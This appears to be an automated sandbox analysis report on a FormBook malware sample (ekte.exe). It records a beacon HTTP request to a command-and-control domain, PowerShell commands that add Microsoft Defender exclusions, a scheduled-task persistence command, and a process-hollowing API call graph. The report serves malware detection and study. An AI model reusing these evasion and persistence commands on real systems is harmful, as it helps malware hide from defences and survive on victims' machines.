                                                                                                  Data Ascii: 5A0viwufYiIYoWh4FtvnKOzflGhhE7qXjRYiY8JBbUNMD0YozIRQ9lK7HuahEEi3xZcHEcenwe8DUp2JzlvMa2+RQjd0J6lxnwFAETJ/pMKnyEFvkRapZtk+GlSNb/9BhTYxMCLaok0klqBzdGTMqzK+QP4+RhiRcCOSIujqC1BObO7kcuj+uMussb9eIVQM5UFw0MD1RNM7Ly/NE9t4lQ7I9Eq5eNW9Mmj7wNgosVcQ71FfkJP


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  22192.168.2.224918915.197.148.3380
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:47.254251957 CEST481OUTGET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:48.791564941 CEST404INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:16:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 30 49 38 62 4a 57 68 3d 57 59 7a 77 33 6d 30 77 71 65 72 31 72 77 46 66 69 55 77 58 72 36 72 6e 71 6d 71 77 63 35 38 37 72 30 6f 45 55 64 52 43 35 44 4b 37 77 58 57 61 6d 33 6a 70 59 4b 6e 2f 61 33 30 56 2b 50 55 52 6c 36 77 39 6e 6d 39 31 5a 61 6c 2b 59 78 72 56 4d 6e 67 4f 69 44 44 4b 5a 45 54 37 4c 43 74 6a 65 74 73 46 47 4f 31 59 71 72 45 4a 45 35 32 38 62 34 41 6e 49 62 67 73 5a 38 34 68 26 49 7a 43 44 58 3d 4a 52 45 70 77 48 43 38 53 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S"}</script></head></html>


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:07:14:40
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\Desktop\ekte.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x13d0000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:07:14:42
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x340000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:07:14:43
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x340000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:07:14:43
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
                                                                                                  Imagebase:0x640000
                                                                                                  File size:179'712 bytes
                                                                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:07:14:44
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\Desktop\ekte.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\ekte.exe"
                                                                                                  Imagebase:0x13d0000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:07:14:47
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\System32\taskeng.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                  Imagebase:0xff6a0000
                                                                                                  File size:464'384 bytes
                                                                                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:07:14:49
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Imagebase:0xe70000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:07:14:54
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x1360000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0x1360000
                                                                                                  File size:427'008 bytes
                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"
                                                                                                  Imagebase:0x3e0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:07:14:55
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
                                                                                                  Imagebase:0xb10000
                                                                                                  File size:179'712 bytes
                                                                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:07:15:00
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
                                                                                                  Imagebase:0xe70000
                                                                                                  File size:738'312 bytes
                                                                                                  MD5 hash:A0F5D21AB28654F9310E591044950160
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:07:15:01
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                                                                                  Imagebase:0xa20000
                                                                                                  File size:62'976 bytes
                                                                                                  MD5 hash:18F02C555FBC9885DF9DB77754D6BB9B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:20
                                                                                                  Start time:07:15:13
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe"
                                                                                                  Imagebase:0x3e0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:07:15:29
                                                                                                  Start date:21/10/2024
                                                                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x11a0000
                                                                                                  File size:517'064 bytes
                                                                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:14.5%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:104
                                                                                                    Total number of Limit Nodes:4
                                                                                                    execution_graph 11242 1bfad5 11243 1bfadf 11242->11243 11245 1bfb93 11242->11245 11244 1bfaf4 11245->11244 11248 ca1898 11245->11248 11253 ca1889 11245->11253 11249 ca18ad 11248->11249 11258 ca18c8 11249->11258 11271 ca193e 11249->11271 11250 ca18bf 11250->11245 11254 ca18ad 11253->11254 11256 ca18c8 12 API calls 11254->11256 11257 ca193e 12 API calls 11254->11257 11255 ca18bf 11255->11245 11256->11255 11257->11255 11259 ca18cc 11258->11259 11285 ca205c 11259->11285 11290 ca21e9 11259->11290 11295 ca1fba 11259->11295 11300 ca1f1a 11259->11300 11305 ca1cd4 11259->11305 11310 ca1d77 11259->11310 11315 ca2196 11259->11315 11319 ca2020 11259->11319 11324 ca1cf0 11259->11324 11330 ca20e3 11259->11330 11260 ca18fa 11260->11250 11272 ca18cc 11271->11272 11274 ca1941 11271->11274 11275 ca1f1a 2 API calls 11272->11275 11276 ca1fba 2 API calls 11272->11276 11277 ca21e9 2 API calls 11272->11277 11278 ca205c 2 API calls 11272->11278 11279 ca20e3 2 API calls 11272->11279 11280 ca1cf0 2 API calls 11272->11280 11281 ca2020 2 API calls 11272->11281 11282 ca2196 2 API calls 11272->11282 11283 ca1d77 2 API calls 11272->11283 11284 ca1cd4 2 API calls 11272->11284 11273 ca18fa 11273->11250 11275->11273 11276->11273 11277->11273 11278->11273 11279->11273 11280->11273 11281->11273 11282->11273 11283->11273 11284->11273 11286 ca2082 11285->11286 11335 1be4a8 11286->11335 11339 1be4b0 11286->11339 11287 ca2097 11291 ca21ef 11290->11291 11343 1bf1c8 11291->11343 11347 1bf1c0 11291->11347 11292 ca2212 11292->11260 11296 ca226b 11295->11296 11351 1be598 11296->11351 11355 1be5a0 11296->11355 11297 ca2286 11297->11260 11301 ca1f27 11300->11301 11359 1bf068 11301->11359 11363 1bf061 11301->11363 11302 ca22dd 11306 ca1d07 11305->11306 11367 1bf400 11306->11367 11371 1bf3f5 11306->11371 11311 ca1d8c 11310->11311 11375 1bef38 11311->11375 11379 1bef40 11311->11379 11312 ca233e 11312->11260 11317 1bf068 WriteProcessMemory 11315->11317 11318 1bf061 WriteProcessMemory 11315->11318 11316 ca21be 11317->11316 11318->11316 11320 ca202d 11319->11320 11322 1be4a8 ResumeThread 11320->11322 11323 1be4b0 ResumeThread 11320->11323 11321 ca2097 11322->11321 11323->11321 11326 ca1ce1 11324->11326 11325 ca1d3a 11325->11260 11327 ca27a1 11326->11327 11328 1bf400 CreateProcessA 11326->11328 11329 1bf3f5 CreateProcessA 11326->11329 11327->11260 11328->11325 11329->11325 11331 ca20f3 11330->11331 11333 1bf068 WriteProcessMemory 11331->11333 11334 1bf061 WriteProcessMemory 11331->11334 11332 ca2423 11332->11260 11333->11332 11334->11332 11336 1be4f4 ResumeThread 11335->11336 11338 1be546 11336->11338 11338->11287 11340 1be4f4 ResumeThread 11339->11340 11342 1be546 11340->11342 11342->11287 11344 1bf214 ReadProcessMemory 11343->11344 11346 1bf292 11344->11346 11346->11292 11348 1bf214 ReadProcessMemory 11347->11348 11350 1bf292 11348->11350 11350->11292 11352 1be5e9 Wow64SetThreadContext 11351->11352 11354 1be667 11352->11354 11354->11297 11356 1be5e9 Wow64SetThreadContext 11355->11356 11358 1be667 11356->11358 11358->11297 11360 1bf0b4 WriteProcessMemory 11359->11360 11362 1bf153 11360->11362 11362->11302 11364 1bf0b4 WriteProcessMemory 11363->11364 11366 1bf153 11364->11366 11366->11302 11368 1bf487 11367->11368 11368->11368 11369 1bf672 CreateProcessA 11368->11369 11370 1bf6e5 11369->11370 11372 1bf487 11371->11372 11372->11372 11373 1bf672 CreateProcessA 11372->11373 11374 1bf6e5 11373->11374 11376 1bef84 VirtualAllocEx 11375->11376 11378 1bf002 11376->11378 11378->11312 11380 1bef84 VirtualAllocEx 11379->11380 11382 1bf002 11380->11382 11382->11312

                                                                                                    Executed Functions

                                                                                                    Function 001B44D8 Relevance: 4.3, Strings: 3, Instructions: 535COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 1b44d8-1b4500 1 1b4502 0->1 2 1b4507-1b45c3 0->2 1->2 5 1b45c8-1b45d5 2->5 6 1b45c5-1b45eb 2->6 5->6 8 1b4a9f-1b4ad2 6->8 9 1b45f1-1b461b 6->9 12 1b4ad5-1b4ad9 8->12 13 1b4c61-1b4c6d 9->13 14 1b4621-1b4639 9->14 15 1b4adf-1b4ae5 12->15 16 1b46f6-1b46fa 12->16 18 1b4c73-1b4c7c 13->18 17 1b463f-1b4640 14->17 14->18 15->8 19 1b4ae7-1b4b33 15->19 20 1b470c-1b4712 16->20 21 1b46fc-1b470a 16->21 22 1b4c47-1b4c53 17->22 27 1b4c82-1b4c8e 18->27 35 1b4b5b-1b4b76 19->35 36 1b4b35-1b4b59 19->36 24 1b4757-1b475b 20->24 23 1b476a-1b479c 21->23 25 1b4c59-1b4c60 22->25 26 1b4645-1b4651 22->26 51 1b479e-1b47aa 23->51 52 1b47c6 23->52 31 1b475d 24->31 32 1b4714-1b4720 24->32 28 1b4658-1b4673 26->28 29 1b4653 26->29 40 1b4c94-1b4ca0 27->40 28->27 39 1b4679-1b469e 28->39 29->28 33 1b4760-1b4764 31->33 37 1b4722 32->37 38 1b4727-1b472f 32->38 33->23 41 1b46dc-1b46f3 33->41 42 1b4b7f-1b4bef 35->42 36->42 37->38 43 1b4731-1b4745 38->43 44 1b4754 38->44 39->40 54 1b46a4-1b46a6 39->54 45 1b4ca6-1b4cad 40->45 41->16 63 1b4bf6-1b4c09 42->63 48 1b474b-1b4752 43->48 49 1b46a9-1b46b4 43->49 44->24 48->31 49->45 55 1b46ba-1b46d7 49->55 56 1b47ac-1b47b2 51->56 57 1b47b4-1b47ba 51->57 58 1b47cc-1b47f9 52->58 54->49 55->33 60 1b47c4 56->60 57->60 65 1b47fb-1b4833 58->65 66 1b4848-1b48db 58->66 60->58 67 1b4c18-1b4c1d 63->67 65->67 78 1b48dd 66->78 79 1b48e4-1b48e5 66->79 68 1b4c1f-1b4c2d 67->68 69 1b4c34-1b4c44 67->69 68->69 69->22 78->79 80 1b4936-1b493c 79->80 81 1b493e-1b49f1 80->81 82 1b48e7-1b4906 80->82 92 1b4a23-1b4a27 81->92 93 1b49f3-1b4a1d 81->93 83 1b4908 82->83 84 1b490d-1b4933 82->84 83->84 84->80 94 1b4a59-1b4a5d 92->94 95 1b4a29-1b4a53 92->95 93->92 96 1b4a8f-1b4a93 94->96 97 1b4a5f-1b4a89 94->97 95->94 96->19 98 1b4a95-1b4a9d 96->98 97->96 98->12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: :$p!p$~
                                                                                                    • API String ID: 0-320839381
                                                                                                    • Opcode ID: bb6a8eff16e19c52824c1f41d3295a4ae28739f187b3a0f246695f56129dc789
                                                                                                    • Instruction ID: e27e6033ce83a32c0794b0cc8fcf454b38eac294987509f40fe75fbfcc7d1f3c
                                                                                                    • Opcode Fuzzy Hash: bb6a8eff16e19c52824c1f41d3295a4ae28739f187b3a0f246695f56129dc789
                                                                                                    • Instruction Fuzzy Hash: 2532C375A00228DFDB19CFA5C984E99BBB2FF49300F1581E9E509AB262D731DD91DF40
                                                                                                    Function 001B185A Relevance: .8, Instructions: 751COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9ccc882e7294d59326af2c5bc35dff46c29da1244dcb80c1f8c0484ab708d864
                                                                                                    • Instruction ID: 53d68d5845c2f03b245f48154a81b5e82334f55a1cc8f61a022b246545167d51
                                                                                                    • Opcode Fuzzy Hash: 9ccc882e7294d59326af2c5bc35dff46c29da1244dcb80c1f8c0484ab708d864
                                                                                                    • Instruction Fuzzy Hash: 9872D334A10619CFDB14DF64C894BD9B7B2BF9A304F5185EAE8096B361DB30AE85CF50
                                                                                                    Function 001B04EC Relevance: .7, Instructions: 747COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21fdb8da3fb610fc82d5e4eb8204b675a8dc670a261265519c584deb6a2ea29d
                                                                                                    • Instruction ID: 8e4cc14921ced2aba44cf3dc8119b47fa5f391618d7070d1d8c3db3eafb5cdf4
                                                                                                    • Opcode Fuzzy Hash: 21fdb8da3fb610fc82d5e4eb8204b675a8dc670a261265519c584deb6a2ea29d
                                                                                                    • Instruction Fuzzy Hash: 0972C334A10619DFDB14DF64C894BD9B3B2BF9A304F5185EAE8096B361DB30AE85CF50
                                                                                                    Function 001BA6B0 Relevance: .1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.373966133.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1b0000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 507ca9a23d92b85fc5403dc7a94af6217174afc2a4d994b310022b4bda09bcdf
                                                                                                    • Instruction ID: 972bc78ac775ccd942b9e5cd3cd5ff197d00a95d30a52c717d6723e4a7302caf
                                                                                                    • Opcode Fuzzy Hash: 507ca9a23d92b85fc5403dc7a94af6217174afc2a4d994b310022b4bda09bcdf
                                                                                                    • Instruction Fuzzy Hash: F3211D70D056588BDB18CF6AC9442EEFBB6AFC9300F14C56AD409A7265EB740949DB41
                                                                                                    Function 001BF3F5 Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
